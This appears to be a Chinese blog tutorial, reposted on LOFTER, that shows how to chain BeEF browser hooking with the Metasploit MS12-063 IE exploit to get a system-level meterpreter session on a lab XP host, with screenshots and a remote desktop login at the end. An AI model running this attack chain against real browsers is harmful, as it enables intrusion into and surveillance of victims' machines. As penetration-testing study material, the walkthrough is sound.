BeEF+MSF拿内网主机

M0L0K's Blog—关注网络安全与渗透测试~:

用到的工具:beEF+msf

利用的IE漏洞:MS12-063 

先配置下: 

root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
编辑下config.yaml
把metasploit :false改成true 

再进入extensions/metasploit/  
同样修改下config.yaml
把host跟callback_host 改成自己的IP 这里是220.128  

再改动下custom path:  

这样beef已经配置好了。那就运行下metasploit

运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass  

这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。  

进入beef

账号密码beef 配置文件里面有。beef:beef  

那beef已经都OK了。  
现在来搞下选择下要显示的页面:  

 
 
hook.js 运行beef 显示出来的。  
别忘记运行下apache。  

我们再进入msf

use exploit/windows/browser/ie_execcommand_uaf
可以自己根据自己的要求来选择。 

show options
port可以自已改。 

用xp+ie7做受害者 

直接访问下我们的页面192.168.220.128/xss/  
beef就会显示出来了。  

点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。  
把地址改成192.168.220.128:8080(msf生成的地址)  

我们就会看到msf上面已经显示出来了。 回显了sessions
payload可以自己去改。使用的meterpreter载荷  

执行sessions -i  

执行sessions -i ID号  
可以执行任意命令已经是系统权限  

执行下screenshost 截屏 
meterpreter > screenshot Screenshot saved to: /root/1.jpg

也可以rdesktop 远程连接上去。  
参数:rdesktop -f ip -u username -p password


评论
热度(9)
  1. h3arkJavan's blog 转载了此文字
  2. Louis千秋雪 转载了此文字
  3. 千秋雪building 转载了此文字
  4. Javan's blogbuilding 转载了此文字
 

© 千秋雪 | Powered by LOFTER